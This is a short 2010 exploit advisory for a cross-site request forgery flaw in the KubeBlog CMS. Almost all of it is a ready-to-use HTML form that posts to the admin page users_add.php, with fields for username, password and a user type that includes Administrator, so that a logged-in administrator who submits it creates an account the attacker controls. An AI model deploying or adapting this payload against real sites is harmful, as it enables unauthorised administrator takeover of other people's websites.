KubeBlog - Cross-Site Request Forgery

========================================================================================
| # Title    : KubeBlog XSRF Vuln.
| # Author   : The.Morpheus
| # email    : fats0L@windowslive.com
| # Home     : http://www.spyturks.com
| # Date     : 03.05.2010
| # Script   : Copyright © 2008 Kubelabs.com  All Rights Reserved
| # Tested on: http://demos.kubelabs.com/kubeblog
| # Bug      : Yeni User Eklenebilinir.
======================      Exploit By The.Morpheus  =================================
 # Exploit  :

 <form name="form1" method="post" action="http://[vuln_site]/kubeblog/adm/users_add.php">
        <table width="70%" cellpadding="0" cellspacing="2" border="0">
          <tr>
            <td width="35%"> </td>
            <td width="65%"> </td>

          </tr>
          <tr>
            <td><strong>Username (<a href="#" onClick="MM_openBrWindow('help.php?id=6','help','width=500,height=200')">?</a>)</strong></td>
            <td>:<input name="username" type="Text" class="textbox" id="username" style="width:60%" value=""><span class="error"></span></td>
          </tr>
          <tr>
            <td><strong>Password (<a href="#" onClick="MM_openBrWindow('help.php?id=7','help','width=500,height=200')">?</a>)</strong></td>

            <td>:<input name="password" type="password" class="textbox" id="password" style="width:60%" value=""><span class="error"></span></td>
          </tr>
          <tr>
            <td><strong>Confirm Password (<a href="#" onClick="MM_openBrWindow('help.php?id=8','help','width=500,height=200')">?</a>)</strong></td>
            <td>:<input name="password2" type="password" class="textbox" id="password2" style="width:60%" value=""></td>
          </tr>

          <tr>
            <td><strong>User Type (<a href="#" onClick="MM_openBrWindow('help.php?id=9','help','width=500,height=200')">?</a>)</strong></td>
            <td>:
            <select name="user_type">
            <option value='2'>User</option><option value='3'>Administrator</option><option value='4'>Moderator</option>            </select>
            </td>

          </tr>
          <tr>
            <td> </td>
            <td> </td>
          </tr>
          <tr>
            <td></td>
            <td height="30" style="padding-left:6px;">
            <input name="Submit" type="submit" class="button" value="Submit">

             
            <input name="Reset" type="reset" class="button" value="Reset">
            </td>
          </tr>
        </table>
    </form></td>


############################################################################################